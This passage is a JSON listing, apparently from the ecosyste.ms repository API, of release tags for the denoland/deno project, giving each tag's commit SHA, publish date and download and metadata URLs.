pi/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ec